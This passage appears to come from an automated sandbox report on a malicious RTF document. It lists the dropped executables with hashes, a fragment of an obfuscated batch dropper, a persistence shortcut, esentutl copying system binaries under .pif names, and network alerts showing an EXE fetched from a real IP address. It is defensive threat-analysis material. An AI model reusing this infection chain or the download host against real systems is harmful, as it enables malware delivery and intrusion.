                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................2...f......$H.......P....@..........................0...................@...............................(...p..........................Pl......................................................H............................text....'.......(.................. ..`.itext..l....@.......,.............. ..`.data........P.......6..............@....bss.....6...p.......J...................idata...(.......*...J..............@....tls....4............t...................rdata...............t..............@..@.reloc..Pl.......n...v..............@..B.rsrc........p......................@..@.............0......................@..@................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A6359FF7-47CA-4C7C-913F-93A8F8DB94D8}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:CE338FE6899778AACFC28414F2D9498B
                                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{92722C27-8B95-4B62-9DF9-92A5A0127A04}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9C219E5D-E800-44BD-9F46-1454841D2525}.tmp

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11264
                                        Entropy (8bit):3.528065202073949
                                        Encrypted:false
                                        SSDEEP:192:nWl9fM1ZlssgnYr0C8TopBqa7Vh3jZMOKhTFMzsSX3Aql3WkNByOgVOYVgkgpXiR:nWvUZyRnYr03ToSsr3KSnplmkNBAgRJu
                                        MD5:61B5AB2FBDF728C5F1A5BB23BFC2A371
                                        SHA1:7689D40EE8CD4C19977F6285DB8DD972263D6DED
                                        SHA-256:3DA845AAFDD0E282DFA5C094C28F037B289B463FF4A71F1FAF435772798D1D12
                                        SHA-512:1EC7AADC0C54B9614BBCAD9D1C68AEFEDCCB22D44652464F359222CD8D5C9A1C313FEA7781E51BB4474C4C249BDC445A8A2A6B4B9AA1F968760ED75434E2EB8E
                                        Malicious:false
                                        Preview:4.8.1.5.1.6.9.1.0.!.|.7.?.9...5.*.?.=.7.1.]./.<.>...[.).].'.'...~.+.?.|.].+.@...>.?.#.5.#.).1.....8.`.#.[.<.>.=.;.].5.3.2.1.3.!.(.[...=.^./.~.~.|.?.=.'.!.~.:.;.#.-.&.,.+.4.@.~.@.'.1.].?.`.?.4.].?.`.'.?.`.<.+...)...~.&.9.*.|.0...-.7...?.`.@.`.5.^.[.8.:.2.(...8.*.:...9.|...,.?.*.0.*.@.@.4.?.7.1.?.%.`.!.&.`.....&.-.'.~.4.2.6.(.0.8.~.-.#.0...4.^.6.`...2._.).>._...7.^.2.,.,.,.,.?.<.3.,.#.`.#._...8.4.^...3.4.@.>.@.<.7.@.4.(.&.^.$.(.-.%.+...)._.`.4.6.6...1.7.!.).^.9.'.~.1.4.$.../.=.2.[.*.&.>.).5.8.7.7.^.%.).=.~.~.-._.1.^.9.^...:.:.?.@.4.?.*.).^.!.,.3.?.).$.2.?.~.~.2...[.3./...#.^.$.?.>...%.4.&.~.~.3.|.?./.8.1.:._.4./.8.-...|.;.*.#.'...8.`.0.1.&.1...).'.%.?.6.?.[.=.,.%.=.*._.~.|.&...6.;.0.2.2.'.*.5.?...3.?.?.!.=.@.8.?.1.7.@.6.<.2././.&.1.>.%.-.!.4.?.0.?./.9.?.$.%.'.3.#...1.../.;...@...2.&.:.5.;.?.`._.$.0.+.?.0.+.5.(.6.2.4.|.%.!.-./.[.9.?.3.#.1.'.>.8.:.^.).^.`.,.'.%.4.?.2.#...3...'.!...(.....0.!.'.9.+.@.[.@.1.].3.7.<.[.|.3.?.(.).7.%.?.?._.%.*.?._.?.1.`.?.`.#.'.$.^.:.=.?./.4.8.,.9._.*.7.#.;.?.%.

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\K0hpP6V2fo.LNK

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Wed Sep 25 06:43:17 2024, length=104003, window=hide
                                        Category:dropped
                                        Size (bytes):1014
                                        Entropy (8bit):4.530872954267802
                                        Encrypted:false
                                        SSDEEP:12:8EbFgXg/XAlCPCHaXR3TBYB/Pr+X+Ws3cLGrN7icvb04RDtZ3YilMMEpxRljKlcM:8A/XTdmsWsLne5Dv3qf57u
                                        MD5:E0F3E26562E1B52FE07DB7F9F78D79B1
                                        SHA1:9B6500682DD2FE9720C49F8CDF3EF7373E5C4BD6
                                        SHA-256:5C2FEA784A2CC32EA708FD4BF1414D3864A54356459FC9F0F960C1E5AE169606
                                        SHA-512:E0AB11FE67453094F0DBEF2DA57DB6B5A9E330C15A9250A450FDB62D3F5E1D6F849F3E23BD4A89DDF90D365D4CB633485A227EFB4C86D239087647766C1802B8
                                        Malicious:false
                                        Preview:L..................F.... ...R.s.r...R.s.r...........C............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....9Yf=..user.8......QK.X9Yf=*...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.C...9Yi= .K0HPP6~1.RTF..J.......WG..WG.*.........................K.0.h.p.P.6.V.2.f.o...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\K0hpP6V2fo.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.K.0.h.p.P.6.V.2.f.o...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.553909258900532
                                        Encrypted:false
                                        SSDEEP:3:Hl7H86lm4cH86lv:Hl7lml1
                                        MD5:547A0658A453A3DD8667D25B07BBE22D
                                        SHA1:E3AF8DD091DE71FE66AB9D36281125CF2398DCE4
                                        SHA-256:B67F3C7600D5E0E6D0E51CDC1F2F35C924DE716334F273C53F40AE3AA6BA1CAA
                                        SHA-512:ED592194E8521DDFF58BF904D47E1D6D8232C432FF87C2CF2B32D6E572E168D90907866F5334F97EB280E2B61EF5EDA35DD734709528745A7C093D31E8177440
                                        Malicious:false
                                        Preview:[misc]..K0hpP6V2fo.LNK=0..[folders]..K0hpP6V2fo.LNK=0..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        C:\Users\user\AppData\Roaming\audiodg.exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................2...f......$H.......P....@..........................0...................@...............................(...p..........................Pl......................................................H............................text....'.......(.................. ..`.itext..l....@.......,.............. ..`.data........P.......6..............@....bss.....6...p.......J...................idata...(.......*...J..............@....tls....4............t...................rdata...............t..............@..@.reloc..Pl.......n...v..............@..B.rsrc........p......................@..@.............0......................@..@................................................................................................

                                        C:\Users\user\Desktop\~$hpP6V2fo.rtf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                        C:\Users\Public\Libraries\PNO

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):2.0
                                        Encrypted:false
                                        SSDEEP:3:Jn:Jn
                                        MD5:17A1D5E252F7DEA2B5162C7E8CE55239
                                        SHA1:0796EB344F59291ECB828FB4307BF831314A72DC
                                        SHA-256:8C094FA7A36D960F46EB971614F084207C9A037D28C4B42B622F887EFE455D99
                                        SHA-512:2DE9E6087141362BF25773C77FADB788B5A88A8FB55373848C044C6DE62ACEC8905588610A1CDACB746A4AD3F93B4415A09B05A868650B13CE8114F2AE1CFC8E
                                        Malicious:false
                                        Preview:47..

                                        C:\Users\Public\Libraries\Qzzgbhha

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):838459
                                        Entropy (8bit):7.206470842924749
                                        Encrypted:false
                                        SSDEEP:12288:cd6lycsEh2/Qd72Q9q7UKotuTJ/4hppo5lc06HxNnrpEGOFz9cWVAfGWYHW8:k6lycs4Nd7Azo41uppOOhIFBe+Z
                                        MD5:E9303B0472758478C2F6287D39F73614
                                        SHA1:FAD32F4636A60969F0C9C3B1CA8D1A0AB5C9D37D
                                        SHA-256:4224050F7B373F1F8D35D736741DCE705F12058F2BCDDA8FAB9D95969D3722FF
                                        SHA-512:3237492F2A486E0E2CCE18DBAAA16798039C967C34AB60162A37F010E96588EFF58549361AACD08FB80FF13DC8DF8212AA45C89A012B69349F23CF5CC0CBD5FD
                                        Malicious:true
                                        Preview:...Y#..K#%'...#....."'.......!............ !'....% .........%... $$.%.'..'.'%$..&&....Y#..K.''...........Y#..K..........}..7:0..v..........7G...0..<..A.....'..`L.:.......N.....{*...5I>....KI.:.L={.79..V7...q..%X....*..0.6.d5e...z&.....lX.js..7./..8.,...........@.*O... Zw......512..7......z+...U,1.m..X.. X.0B--E5..rH........].......%B6...#..y..K...Sf.....3.......Q..W.W..rL......)O..4...=.........R9.......#)N5..DF........L73E...5.O2y.8^.nX.N.v...".lm..........mP..._~..`R,.C.........K....2...R..{Q.W.z....O:>.54....Q...Z...X..V9B...5.2s...1...WF4.N....2...XJ...QJ.R...S.8.O.BH.....<:14....Y.....uGd.....H.r......._....L....(E...;...=.UF.46....5.?.z.?W E..'.....9....O=33..+.....1BCH....Y|.R..U.b#w.k..P.v+.S..V..I..........O...........O'..........'.../....2:..CU/.-.1..a.h.4.<.H..v.........M.M..../7.. ...p-.H../....q...j..."k...Wd.5.>5..*.=.&`i.........cJ..........%....N(..1...O.n....K..............U..,.....!....3..N.o......1.........H....

                                        C:\Users\Public\Libraries\Qzzgbhha.PIF

                                        Download File
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1088512
                                        Entropy (8bit):6.864877848429584
                                        Encrypted:false
                                        SSDEEP:24576:ZUfEsM2Vlh4rSmqEhbhuJ2GH7JeUPUd6Yq7+gyQxy/Z:ZC4m/H7UU
                                        MD5:BBF710C83246092A538128620853D4FD
                                        SHA1:95338F06C76178DE31B5E8453F92C43F970EA9F9
                                        SHA-256:7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                                        SHA-512:A609D92FE0D25E7DB140C731AF4B241D47CDADDFE735D9F7575C982EF790AB01D7F969038546E6054101B745E8C208F74E41FAF246173CA0722C7B994CF94001
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        Joe Sandbox View:
                                        • Filename: XjPA2pnUhC.exe, Detection: malicious, Browse
                                        • Filename: Payment Slip.xls, Detection: malicious, Browse
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................2...f......$H.......P....@..........................0...................@...............................(...p..........................Pl......................................................H............................text....'.......(.................. ..`.itext..l....@.......,.............. ..`.data........P.......6..............@....bss.....6...p.......J...................idata...(.......*...J..............@....tls....4............t...................rdata...............t..............@..@.reloc..Pl.......n...v..............@..B.rsrc........p......................@..@.............0......................@..@................................................................................................

                                        C:\Users\Public\Libraries\ahhbgzzQ.cmd

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):62357
                                        Entropy (8bit):4.705712327109906
                                        Encrypted:false
                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                        Malicious:false
                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                        C:\Users\Public\Qzzgbhha.url

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\audiodg.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF">), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):104
                                        Entropy (8bit):5.186977310292462
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMskWTsbxc1RPu:HRYFVmTWDyzZkWTExc1RPu
                                        MD5:C03CC70E37479190C34873448F1342AA
                                        SHA1:1CF34EC1DEA5FE2674FEDB961B99BB8840C6D190
                                        SHA-256:95949DC04D34E61CF21853C30F925DABB10AC3F5723EA71A576A864087F2A569
                                        SHA-512:7F1E76F3981B1D16A677788BFDEA7FA09B6B960FD6F30296F0CA1DE15955AE390A9C9CAC1F3B5345B47F4AEA70D084A1F10B71B7BEE45254DFAA980783CE407F
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF"..IconIndex=925978..HotKey=33..

                                        C:\Users\Public\alpha.pif

                                        Download File
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):302592
                                        Entropy (8bit):4.593928239196407
                                        Encrypted:false
                                        SSDEEP:3072:H/Fkbff/FoeMrx9O1vfjQdLCQMcP7FRCMkLjyGez1c:H9kbtoLtM1nM9xf/CMkLmt+
                                        MD5:AD7B9C14083B52BC532FBA5948342B98
                                        SHA1:EE8CBF12D87C4D388F09B4F69BED2E91682920B5
                                        SHA-256:17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
                                        SHA-512:E12AAD20C824187B39EDB3C7943709290B5DDBF1B4032988DB46F2E86DA3CF7E7783F78C82E4DC5DA232F666B8F9799A260A1F8E2694EB4D0CDAF78DA710FDE1
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../../../..Wx./..Wi./../..g/..Wo./..W../..Wh./..Wm./..Rich./..........................PE..L...+..L.....................l............... .....J................................={....@..................................'..d.......P.......................0....;..8...............................@....................$.......................text... ,.......................... ..`.data...0....@.......2..............@....rsrc...P...........................@..@.reloc..0...........................@..B..L8...n..LC.....LM...n..LC...1..LZ...9..L............msvcrt.dll.ntdll.dll.KERNEL32.dll.api-ms-win-core-processthreads-l1-1-0.DLL.WINBRAND.dll........................................................................................................................................................................................................................

                                        C:\Users\Public\xpha.pif

                                        Download File
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):15360
                                        Entropy (8bit):5.721538416093858
                                        Encrypted:false
                                        SSDEEP:384:lOi8W9+0F7A3fNpl+rKOFvK/WDHlWyzo:slWE0F7gle1j
                                        MD5:6242E3D67787CCBF4E06AD2982853144
                                        SHA1:6AC7947207D999A65890AB25FE344955DA35028E
                                        SHA-256:4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB1D
                                        SHA-512:7D0D457E1537D624119A8023BCC086575696A5739C0460EF11554AFAC13AF5E5D1EDC7629A10E62834ABA9F1B3AB1442011B15B4C3930399D91DCA34B3B1CBAF
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)wO.m.!.m.!.m.!.dn..l.!.dn..l.!.dn..|.!.m. .$.!.dn..{.!.dn..l.!.dn..l.!.Richm.!.........................PE..L...d.[J.................(...&.......*.......@.......................................{....@...... ...........................0.......`.......................p.. ...0...................................@............................................text...r&.......(.................. ..`.data........@.......,..............@....rsrc........`......................@..@.reloc.......p.......8..............@..B~.[J@.....[JM...o.[JZ.....[Je.../.[Jr.....[J}...J.[J............ADVAPI32.dll.KERNEL32.dll.msvcrt.dll.IPHLPAPI.DLL.USER32.dll.ntdll.dll.WS2_32.dll.......................................................................................................................................................................................................................

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):440
                                        Entropy (8bit):4.414834612341623
                                        Encrypted:false
                                        SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjC9B8NGNT:/p4xT5cp7u0wQz8Ng
                                        MD5:D6FD95E16E65742E3C5F7A76904B7D9D
                                        SHA1:9D32DADB0FCCE263CCEA52FFD09BDB70EC003DAF
                                        SHA-256:F7220592C15EA8CEFD38D3DA882A03DB13CF379FD1445AB31FD8B7E8C8C03DDF
                                        SHA-512:46E06D94DFA907434D0A27A1EAE80C4ED530966198F45C1CBF11B4656B7C6E94F65D9C5E285487D32824829DDA46A369435EC8421CCE20F5F7A12B02ACBB85E0
                                        Malicious:false
                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Operation completed successfully in 0.281 seconds.....

                                        Static File Info

                                        General

                                        File type:Rich Text Format data, version 1
                                        Entropy (8bit):2.6616842302746084
                                        TrID:
                                        • Rich Text Format (5005/1) 55.56%
                                        • Rich Text Format (4004/1) 44.44%
                                        File name:K0hpP6V2fo.rtf
                                        File size:104'003 bytes
                                        MD5:7a9a05109dd848058fd327bc38459a3d
                                        SHA1:a086488bd204ca42e9d522b769b94c9467ad5520
                                        SHA256:9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
                                        SHA512:8dde56f67785f7594f1e4fe2a3b05519333daa980bae0fd84ffa34671d1d1f7507af6d04dba4909d3195db536ae2fd2782a6f45f5eb7f0df5015ca4b88e0925d
                                        SSDEEP:768:mbTYjIXuCGvGvJSuv0AwTaTSvq1e397u1X:mojyValnaev+eNK
                                        TLSH:9AA3CD99D78F41A4CF55A67B030A4E8806FCB33EB60141B678AC977037ADC3E49658BD
                                        File Content Preview:{\rtf1..{\*\j60dMM2PnzW8KVuI5mk454GdOVAcaekyRUDuvTF9MwrWrmRf7K61GSFB81RNfQN9eeNXhDnANiytiODXr2Fp68em2Fm7zgq7mLAXaspxH6UHlcPShfqXWMcvXzstUhHNCMEwUkV5Tt4iwj8x31YAORI911Nj4krVKUEoJ6z3MqND81aZKr1kddqzu6ufc7izbUp8yDPPKl4pFmupvzuKAFRza2Ai252ONAgyMNxgoQnZDHFFGAs

                                        File Icon

                                        Icon Hash:2764a3aaaeb7bdbf

                                        Static RTF Info

                                        Objects

                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                        0000014F1hno

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-25T09:43:26.396591+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11107.175.243.14280192.168.2.2249163TCP
                                        2024-09-25T09:43:26.488041+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21107.175.243.14280192.168.2.2249163TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 25, 2024 09:43:25.852999926 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:25.859262943 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:25.859329939 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:25.859515905 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:25.865700006 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396387100 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396409988 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396421909 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396456003 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396469116 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396481037 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396495104 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396536112 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.396590948 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396603107 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396616936 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.396631956 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.396631956 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.396678925 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.401443005 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.401499987 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.401510954 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.401524067 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.401547909 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.401571989 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.401572943 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.401606083 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.480365992 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.484987974 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.485004902 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.485018969 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.485044956 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.485063076 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.485065937 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.485095978 CEST4916380192.168.2.22107.175.243.142
                                        Sep 25, 2024 09:43:26.485095978 CEST8049163107.175.243.142192.168.2.22
                                        Sep 25, 2024 09:43:26.485127926 CEST4916380192.168.2.22107.175.243.142
